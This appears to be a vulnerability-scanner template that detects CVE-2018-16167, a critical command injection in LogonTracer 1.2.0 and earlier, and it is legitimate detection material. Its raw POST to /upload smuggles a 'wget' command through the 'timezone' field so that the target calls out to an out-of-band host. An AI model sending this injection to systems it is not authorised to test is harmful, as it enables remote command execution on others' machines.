id: CVE-2018-16167 info: name: LogonTracer <=1.2.0 - Remote Command Injection author: gy741 severity: critical description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. reference: - https://www.exploit-db.com/exploits/49918 - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 - https://jvn.jp/en/vu/JVNVU98026636/index.html - https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-16167 cwe-id: CWE-78 epss-score: 0.13203 cpe: cpe:2.3:a:jpcert:logontracer:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jpcert product: logontracer tags: rce,oast,edb,cve,cve2018,logontracer,intrusive http: - raw: - | POST /upload HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - http